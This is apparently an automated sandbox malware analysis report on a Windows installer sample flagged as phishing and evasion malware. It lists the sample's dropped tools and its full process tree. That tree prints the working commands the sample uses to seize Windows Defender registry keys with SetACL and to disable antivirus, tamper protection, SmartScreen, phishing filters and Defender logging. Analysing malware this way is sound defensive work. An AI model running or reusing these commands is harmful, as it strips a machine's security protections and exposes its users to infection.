Source: reg.exeProcess created: 67
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708B74C4_2_00007FF69708B74C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706E4B04_2_00007FF69706E4B0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970794BC4_2_00007FF6970794BC
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69705A3504_2_00007FF69705A350
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970313F04_2_00007FF6970313F0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69705BC404_2_00007FF69705BC40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697066B2A4_2_00007FF697066B2A
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708C76C4_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69703F6504_2_00007FF69703F650
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708669C4_2_00007FF69708669C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970897184_2_00007FF697089718
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970475804_2_00007FF697047580
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706A6304_2_00007FF69706A630
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69705E5304_2_00007FF69705E530
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970683604_2_00007FF697068360
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69707F3944_2_00007FF69707F394
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970463E04_2_00007FF6970463E0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970834104_2_00007FF697083410
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706C2504_2_00007FF69706C250
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69707C28F4_2_00007FF69707C28F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708A31C4_2_00007FF69708A31C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970842184_2_00007FF697084218
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708EF6C4_2_00007FF69708EF6C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708DFF04_2_00007FF69708DFF0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69707BFE84_2_00007FF69707BFE8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69707EF304_2_00007FF69707EF30
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697093C644_2_00007FF697093C64
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697057B104_2_00007FF697057B10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69707FB004_2_00007FF69707FB00
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69703CB204_2_00007FF69703CB20
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69703E9D04_2_00007FF69703E9D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706F9C04_2_00007FF69706F9C0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69707EA104_2_00007FF69707EA10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697031A304_2_00007FF697031A30
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708B74C5_2_00007FF69708B74C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69706E4B05_2_00007FF69706E4B0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970794BC5_2_00007FF6970794BC
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69705A3505_2_00007FF69705A350
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970313F05_2_00007FF6970313F0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69707C28F5_2_00007FF69707C28F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69705BC405_2_00007FF69705BC40
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697066B2A5_2_00007FF697066B2A
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708C76C5_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69703F6505_2_00007FF69703F650
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708669C5_2_00007FF69708669C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970897185_2_00007FF697089718
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970475805_2_00007FF697047580
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69706A6305_2_00007FF69706A630
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69705E5305_2_00007FF69705E530
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970683605_2_00007FF697068360
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69707F3945_2_00007FF69707F394
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970463E05_2_00007FF6970463E0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970834105_2_00007FF697083410
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69706C2505_2_00007FF69706C250
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708A31C5_2_00007FF69708A31C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970842185_2_00007FF697084218
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708EF6C5_2_00007FF69708EF6C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708DFF05_2_00007FF69708DFF0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69707BFE85_2_00007FF69707BFE8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69707EF305_2_00007FF69707EF30
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697093C645_2_00007FF697093C64
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697057B105_2_00007FF697057B10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69707FB005_2_00007FF69707FB00
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69703CB205_2_00007FF69703CB20
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69703E9D05_2_00007FF69703E9D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69706F9C05_2_00007FF69706F9C0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69707EA105_2_00007FF69707EA10
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697031A305_2_00007FF697031A30
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe 4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF69703AA20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF69703AC70 appears 185 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF697043F80 appears 232 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF697087998 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF697039CB0 appears 138 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF697039B00 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF697044170 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF6970394C0 appears 170 times
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: String function: 00007FF697039D20 appears 188 times
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewin_version_csharp.exeF vs 3Dut8dFCwD.exe
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSetACL.exe. vs 3Dut8dFCwD.exe
Source: 3Dut8dFCwD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: classification engineClassification label: mal100.phis.evad.winEXE@145/7@0/0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69704BF60 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,4_2_00007FF69704BF60
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697053FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,4_2_00007FF697053FD8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697053D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,4_2_00007FF697053D1B
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697053A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,4_2_00007FF697053A5E
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970442A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6970442A0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697053FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,5_2_00007FF697053FD8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697053D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,5_2_00007FF697053D1B
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697053A5E AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,5_2_00007FF697053A5E
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970442A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF6970442A0
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_004049A4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049A4
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697044810 FindResourceW,LoadResource,LockResource,FreeResource,_invalid_parameter_noinfo_noreturn,4_2_00007FF697044810
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D38.tmpJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat
Source: 3Dut8dFCwD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 3Dut8dFCwD.exeReversingLabs: Detection: 44%
Source: 3Dut8dFCwD.exeVirustotal: Detection: 45%
Source: SetACL64.exeString found in binary or memory: -help
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: -help
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exeString found in binary or memory: Type 'SetACL -help' for help.
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile read: C:\Users\user\Desktop\3Dut8dFCwD.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\3Dut8dFCwD.exe "C:\Users\user\Desktop\3Dut8dFCwD.exe"
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.batJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
